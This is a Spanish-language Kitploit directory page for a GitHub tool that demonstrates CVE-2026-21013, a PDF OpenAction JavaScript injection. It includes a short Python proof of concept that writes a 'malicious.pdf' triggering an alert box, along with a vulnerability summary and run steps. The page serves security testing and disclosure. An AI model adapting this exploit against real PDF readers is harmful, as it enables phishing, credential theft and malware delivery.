Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script — Genera un PDF con JavaScript incrustado para demostrar CVE-2026-21013, una inyección de OpenAction que conduce a la ejecución de scripts en lectores de PDF vulnerables. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad Web
GitHubgeorge0papasotiriou/cve-2026-21013-pdf-javascript-injection-via-embedded-script

CVE-2026-21013-PDF-JavaScript-Injection-via-Embedded-Script

Genera un PDF con JavaScript incrustado para demostrar CVE-2026-21013, una inyección de OpenAction que conduce a la ejecución de scripts en lectores de PDF vulnerables.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
2hace 1 mesAún no revisado
Compartir

CVE-2026-21013 – Inyección de JavaScript en PDF mediante script incrustado

Código del programa (Python que genera un PDF malicioso)

root@kitploit:~
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
    f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")

CVE-2026-21013 – Inyección de JavaScript en PDF mediante OpenAction

Severity: Medium

Resumen

Un generador de PDF no sanitiza el contenido proporcionado por el usuario antes de incrustarlo en el archivo PDF. Un atacante puede inyectar una entrada de JavaScript /OpenAction que se ejecuta cuando se abre el documento, lo que conduce a cross‑site scripting (en visores web) o ejecución de código local (en lectores de escritorio con soporte completo de JS).

Detalles de la vulnerabilidad

  • Tipo: Inyección en PDF / Ejecución de código del lado del cliente
  • Impacto: Phishing, robo de credenciales, entrega de malware.
  • Causa raíz: La biblioteca PDF incrusta directamente cadenas controladas por el atacante en la estructura del PDF sin escape ni validación.

Demostración del exploit

Ejecuta el generador:

root@kitploit:~
python generate_pdf_js_inject.py

Abre el malicious.pdf resultante en un lector de PDF que admita JavaScript; aparecerá un cuadro de alerta.


Descargar herramienta